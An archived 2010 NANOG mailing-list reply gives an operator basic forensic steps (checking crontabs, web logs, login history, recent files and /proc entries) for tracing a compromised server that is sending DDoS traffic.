[122940] in North American Network Operators' Group
Re: Security Guideance
daemon@ATHENA.MIT.EDU (Dan White)
Tue Feb 23 15:41:20 2010
Date: Tue, 23 Feb 2010 14:39:41 -0600
From: Dan White <dwhite@olp.net>
To: Ronald Cotoni <setient@gmail.com>
In-Reply-To: <2f1d68351002231219r1566504fx71c4a353eccee5c5@mail.gmail.com>
Cc: nanog@nanog.org
Errors-To: nanog-bounces+nanog.discuss=bloom-picayune.mit.edu@nanog.org
On 23/02/10 15:19 -0500, Ronald Cotoni wrote:
>Quick suggestion BUT you may want to have Parallels look into it if
>you can't seem to find it since you pay for the support anyways. You
>may also want to check to see if it is a cron job that is doing it (if
>the machine was root kitted, you may have accidentally copied a cron
>job over. Another suggestion would be simply move half the accounts
>to one server and half to another and see if it ddoses again and keep
>doing that until you find the problem account.
I'll second that. I've found a few interesting items in my
/var/spool/cron/crontab before.
Also check your web server logs. If someone has compromised an account via
an apache/php vulnerability, it might show up in your access/error log
(I saw 'wget' in my logs once).
I assume you've checked 'last' to make sure they're not getting in via a
remote shell.
ls -ltra is your friend when finding the most recently created files in your
filesystem.
If you suspect there's a running process doing it, look through your /proc
directory, like in /proc/<pid>/environ, /proc/<pid>/cmdline, etc.
--
Dan White
